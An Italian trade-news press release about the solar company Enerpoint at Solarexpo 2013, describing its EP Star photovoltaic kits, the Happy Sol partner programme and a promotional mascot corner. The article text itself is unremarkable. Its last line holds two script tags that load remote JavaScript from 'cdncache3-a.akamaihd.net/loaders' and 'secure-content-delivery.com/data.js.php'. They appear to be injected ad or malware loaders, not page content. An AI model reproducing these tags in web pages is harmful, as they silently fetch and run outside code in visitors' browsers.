1. Home
  2. Notizie e Mercato
  3. Enerpoint a Solarexpo, “Diamo energia al tuo business!”

Enerpoint a Solarexpo, “Diamo energia al tuo business!”

Energie rinnovabili di
5/5
votato da 1 persone
Soluzioni innovative, una piattaforma di servizi e un nuovo partner commerciale a supporto degli installatori: questa la strategia della storica azienda del fotovoltaico alla fiera dedicata all’energia solare


Enerpoint, attiva da oltre 12 anni nel fotovoltaico e nella diffusione di una sempre maggiore cultura del risparmio energetico, si presenta alla nuova edizione di Solarexpo (Milano 8-10 maggio 2013 – hall 2, stand R15) con EP Star e Happy Sol, proposte innovative di prodotti e servizi che vogliono garantire  nuova energia al business di tutti gli operatori del settore.

Enerpoint si posiziona come punto di riferimento unico per gli operatori con EP Star, una linea di prodotti in grado di soddisfare tutti i tipici bisogni di operatori e utenti finali con soluzioni tecnologiche evolute nella produzione, gestione e uso di energia fotovoltaica. Il fotovoltaico diventa sempre più una parte, sebbene sempre importante, della soluzione energetica da proporre sul mercato, che guarda con crescente attenzione a un uso efficiente dell’energia elettrica, prodotta soprattutto con il fotovoltaico, a cominciare dalla climatizzazione degli ambienti con un occhio sempre puntato verso l’obiettivo del risparmio in bolletta. EP Star è la prima e unica soluzione per impianti fotovoltaici fino a 20 kWp, adatta quindi ad applicazioni residenziali e di piccole industrie, nella quale si offre agli installatori tutto il materiale necessario all’installazione completo di documentazione sempre aggiornata e schemi di progetto. Una soluzione innovativa che facilita il dimensionamento e il reperimento del materiale, riducendo in maniera significativa i tempi e i costi di progettazione e realizzazione. Per scegliere tra le oltre 1000 configurazioni disponibili, Enerpoint ha creato un tool online di facile consultazione per poter configurare il proprio impianto in modo semplice, pratico e veloce.


A Solarexpo 2013 Enerpoint presenta 3 declinazioni di questo prodotto, tutte innovative ed efficaci:

-    EP Star Clima, la soluzione che propone tutti i vantaggi di EP Star in abbinamento alle pompe di calore, macchine elettriche in grado di consumare fino al 75% in meno rispetto alle tradizionali caldaie a gas. Il corretto abbinamento dei sistemi permette un aumento dell’autoconsumo dell’energia fotovoltaica, con notevoli risparmi non solo sulla bolletta elettrica ma anche su quella del riscaldamento. EP Star Clima include tutto il materiale necessario all’installazione.  

-    EP Star Storage, la soluzione con batterie agli ioni di litio in versione “plug-& play”. L’impianto risulta quindi costituito da moduli fotovoltaici, strutture di montaggio e una unità di storage che include ogni dispositivo necessario alla gestione della fonte solare, delle batterie, delle utenze elettriche e della rete elettrica principale. Non è quindi necessario alcun intervento di regolazione o installazione particolare a causa della presenza delle batterie. Le unità hanno una capacità di accumulo netto pari a 8kWh, utili per coprire le necessità energetiche giornaliere di un’utenza media residenziale italiana.

-    EP Star Industriale, la soluzione dedicata al mondo delle imprese per impianti fino a 200kWp che, sviluppata per contenere i costi di materiale e manodopera, consente in molti casi la realizzazione degli impianti addirittura senza incentivi.

Con Happy Sol, invece, Enerpoint presenta agli operatori la possibilità di allargare la propria offerta di sistemi per il risparmio energetico, con una particolare attenzione all’aspetto commerciale, per essere più forti in un momento in cui la crisi preoccupa non poco la maggior parte delle ditte del settore. Happy Sol, è  un vero e proprio partner commerciale che Enerpoint presenta ai propri installatori con l’obiettivo di dar loro gli strumenti per differenziarsi dai competitor e l’opportunità di entrare in un nuovo mercato facendo  conoscere agli utenti del mercato residenziale le potenzialità e i benefici delle tecnologie “green”. L’offerta di Happy Sol si basa, oltre che sull’analisi dei consumi energetici dell’abitazione, sulla proposta di sistemi fotovoltaici, pompe di calore, solare termodinamico e led per una soluzione che punta all’efficienza energetica della casa a 360°.


Allo stand Enerpoint, infine, sarà presente un corner dedicato a Lupo Alberto, il celebre personaggio nato dalla penna di Silver Lupo Alberto che, con la sua simpatica ironia, sarà protagonista di un kit promozionale utilizzabile dagli  Installatori Autorizzati Enerpoint: un ulteriore e concreto supporto dedicato ai migliori clienti di Enerpoint.

A Solarexpo Enerpoint presenta quindi numerose novità tecnologiche, commerciali e di marketing, che messe tutte insieme non possono che infondere rinnovata energia al business degli operatori del settore: un’iniezione di fiducia di cui c’è tanto bisogno.

E’ giunto il momento di cambiare paradigma e di pensare al fotovoltaico come parte di una proposta tecnica e commerciale più ampia – afferma Paolo Rocco Viscontini Presidente e AD di Enerpoint -  Da sempre lavoriamo per garantire standard qualitativi d’eccellenza all’utente finale e ai professionisti del settore con i quali ci interfacciamo. – continua Viscontini -  Con EP Star e Happy Sol, Enerpoint rafforza la sua già significativa e qualificata posizione nel mercato, offrendo soluzioni complete e servizi innovativi, un importantissimo valore aggiunto per chi, come noi di Enerpoint, crede fermamente che il fotovoltaico e le tecnologie per il risparmio energetico (a cominciare dalle pompe di calore)’ rappresentino un bene per la collettività e una ancora grande opportunità di lavoro per migliaia di aziende”.



<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>